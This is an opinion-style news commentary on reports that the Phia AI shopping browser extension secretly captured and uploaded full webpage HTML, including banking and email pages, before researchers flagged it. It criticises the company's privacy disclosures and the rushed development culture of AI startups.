According to Fortune, Phia—the AI shopping startup co-founded by Phoebe Gates and backed by an $8 million Kleiner Perkins-led seed round with investors including Hailey Bieber and Sheryl Sandberg—has been collecting far more user data than disclosed. Security researchers found the browser extension was capturing complete webpage HTML from every site users visited, including bank statements and private emails, even when not interacting with shopping sites. The feature, called “logCompleteHTMLtoGCS,” compressed and transmitted full page copies to Phia’s servers without users’ knowledge. After researcher Maahir Sharma alerted the company last week, Phia removed the HTML collection feature but didn’t disclose the privacy violation to users. The New York-based startup, launched in April and named one of TIME’s Best Inventions of 2025, had reached hundreds of thousands of users before the issue was discovered.
What they were really collecting
Here’s the thing that really alarms me about this situation. We’re not talking about some basic tracking cookies here. The extension was literally taking snapshots of every single webpage you loaded—your banking dashboard, your private emails, your medical portals—and shipping them off to Phia’s servers. Researcher Charlie Eriksen called it “one of the crazier things” he’s seen in his career, and honestly, that might be an understatement.
Think about what that means in practice. That “logCompleteHTMLtoGCS” function buried in the code was essentially creating a perfect replica of your digital life. Your Revolut transactions? Logged. Your Gmail conversations? Logged. Anything you viewed while that extension was active became Phia’s property. And the company’s response that this was for “identifying new retail websites” feels incredibly weak when you consider the sheer volume and sensitivity of what they were taking.
The privacy policy problem
Now let’s talk about the disconnect between what Phia was doing and what they were telling users. Their privacy policy specifically states they “generally exclude personally identifiable information” and collect data only from “retail sites.” But researchers found they were collecting from everywhere. The Chrome Store disclosure claimed user data wasn’t “used or transferred for purposes unrelated to the item’s core functionality.” So why were they archiving people’s banking pages?
This isn’t just bad optics—it’s potentially illegal. Experts told Fortune this likely violates GDPR principles of data minimization and transparency, plus various U.S. state privacy laws. When you look at the Chrome extension privacy details, there’s no mention of this wholesale HTML collection. That’s a pretty massive omission.
Even the fix is problematic
So Phia removed the HTML collection feature. Great. But they’re still collecting URLs, which can themselves contain plenty of sensitive information. Search terms, customer IDs, national identification numbers—if it’s in the URL, Phia gets it. And since users log in with their real email accounts, the company can still reconstruct your entire browsing history and tie it directly to your identity.
Researchers also found some bizarre inconsistencies in their “whitelisting” approach. They don’t collect Google search data but do collect Bing searches. Why the difference? And what other arbitrary rules are governing what gets captured? It feels like they’re playing privacy whack-a-mole rather than implementing a coherent data protection strategy.
The bigger AI startup problem
Maahir Sharma nailed it when he described the “vibe-coding” culture in AI startups today. These companies are moving at breakneck speed—ten times faster than traditional development cycles—and privacy often becomes an afterthought. When you’re racing to secure the next funding round and chasing buzzworthy features, proper security practices get left behind.
And let’s be real—when you’ve got Kleiner Perkins writing checks and celebrities endorsing your product, there’s immense pressure to grow fast and demonstrate value. But that doesn’t excuse building surveillance tools disguised as shopping assistants. The fact that multiple independent researchers had to discover this, and that Phia only acted when confronted, speaks volumes about the current state of AI ethics.
Basically, we’ve reached a point where we need to ask: are these AI tools actually serving users, or are users serving as training data for AI tools? Because when a shopping extension knows more about your banking habits than your shopping preferences, something has gone seriously wrong.
